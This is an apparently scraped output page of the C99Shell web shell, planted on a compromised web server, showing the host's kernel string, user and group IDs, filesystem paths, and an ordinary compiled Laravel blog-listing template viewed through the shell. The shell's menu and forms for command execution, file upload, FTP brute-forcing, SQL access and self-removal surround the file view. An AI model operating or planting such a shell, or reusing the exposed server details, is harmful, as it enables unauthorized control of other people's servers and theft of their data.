!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html/storage/framework/views/   drwxr-xr-x
Free 28.19 GB of 117.98 GB (23.89%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     c2ded659d08e75a0478f1b1ec37c834f.php (2.97 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<?php $__env->startSection('content'); ?>

<!--==== START MAIN ====-->
<section class="mt-3" id="shop-listing">
      <div class="row">
        <div class="col-md-12 col-sm-12 col-xl-12 col-lg-12">
           <?php $__empty_1 true$__currentLoopData $records$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key=>$data): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); $__empty_1 false?>
            <div class="card my-3 order-list">
             <div class="row p-3">
                  <div class="col-md-2 col-sm-2 col-xl-2 col-lg-2 justify-content-center">
                      <img src="<?php echo e(asset('/uploads')); ?>/blog/<?php echo e($data->image); ?>" alt="" class="order-product-image" style="width:60%">
                  </div>
                  <div class="col-md-5 col-sm-5 col-xl-5 col-lg-5">
                      <h3 class="product-name" style="color: #00274E;">
                        <?php echo e($data->title); ?>

                      </h3>
                      <div class="d-flex flex-row">
                        <div class="p-1 "><?php echo e($data->short_description); ?></div>
                      </div>
                  </div>
                  <div class="d-flex flex-column justify-content-center col-md-3 col-sm-3 col-xl-3 col-lg-3">
                    <span class="blog-bottom-text my-2 "><i class="fas fa-eye" style="color:#536372"></i>   <?php echo e($data->views); ?> </span>
                    <span class="blog-bottom-text "><i class="fas fa-clock" style="color:#536372"></i>   <?php echo e(date('d M Y',strtotime($data->created_at))); ?> </span>
                  </div>
                  <div class="col-md-2 col-sm-2 col-xl-2 col-lg-2 text-center d-inline-flex justify-content-between h-25">
                    <a href="<?php echo e(route('blog.detail',['id' => $data->id])); ?>" class="blog-bottom-link-right mx-2">Read Post <i class="fas fa-arrow-right" style="color: #F24C62;"></i> </a>
                  </div>
              </div>
            </div>
            <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); if ($__empty_1): ?>
                <div class="d-flex justify-content-center my-5">
                    <i class="fa fa-heart-o " style="color:<?php echo e(config('settingConfig.config_web_bg')); ?>;  font-size:150px;"></i>
                </div>
                <h4 class="p-5 text-center text-black"><?php echo e(__('account')['wishlist_empty']); ?></h4>
            <?php endif; ?>
            <?php echo e($records->appends(['name' => request()->name])->links()); ?>

        </div>
      </div>
</section>
<!--==== END MAIN ====-->
<?php $__env->stopSection(); ?>

<?php echo $__env->make('frontend.layouts.app', ['class' => 'bg-white'], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data''__path']))->render(); ?><?php /**PATH /home/picotech/domains/ecom1.picotech.app/public_html/resources/views/frontend/blog/allblog.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0042 ]--